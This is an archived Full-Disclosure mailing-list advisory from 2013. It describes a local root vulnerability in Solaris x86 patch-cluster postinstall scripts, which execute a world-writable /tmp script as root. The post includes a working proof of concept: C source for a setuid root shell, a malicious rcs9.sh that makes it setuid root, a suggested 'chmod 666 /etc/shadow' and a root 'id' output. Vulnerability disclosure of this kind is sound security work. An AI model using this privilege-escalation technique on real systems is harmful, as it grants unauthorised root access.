lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-id: <804B48D2-F8B3-4C9E-96C9-019744CF747A@me.com> Date: Sun, 15 Dec 2013 14:51:59 -0500 From: "Larry W. Cashdollar" <larry0@...com> To: full <full-disclosure@...ts.grok.org.uk> Subject: Solaris Recommended Patch Cluster 6/19 local root on x86 Hi, I don't think I ever sent this to the list. Title: Solaris Recommended Patch Cluster 6/19 local root on x86 Date: 7/3/2013 Author: Larry W. Cashdollar, @_larry0 CVE: 2010-1183 If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based. Local root: Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root. ./144751-01/SUNWos86r/install/postinstall 782 if [ -s /tmp/diskette rc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/diskette rc.d/rcs9.sh "post" 785 fi Inject entries into driver_aliases, research config file? maybe we can load our own library/driver? 804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrs tmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driver aliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases ./141445-09/SUNWos86r/install/postinstall 656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/diskette rc.d/rcs9.sh "post" 659 fi Well, it looks like you've got a few chances to abuse it: larry@...waris:~/10x86 Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postnatal Psuedo PoC: Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry. chmod 666 /etc/shadow would be easy. PoC: larry@...waris:~$ cat setuid.c #include #include int main (void) { char *shell[2]; shell[0] = "sh"; shell[1] = NULL; setregid (0, 0); setreuid (0, 0); execve ("/bin/sh", shell, NULL); return(0); } gcc -o /tmp/r00t setuid.c larry@...waris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t After patches have been applied: larry@...waris:~$ /tmp/r00t # id uid=0(root) gid=0(root) Advisory: http://www.vapid.dhs.org/advisories/solaris-patch-cluster-x86root.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists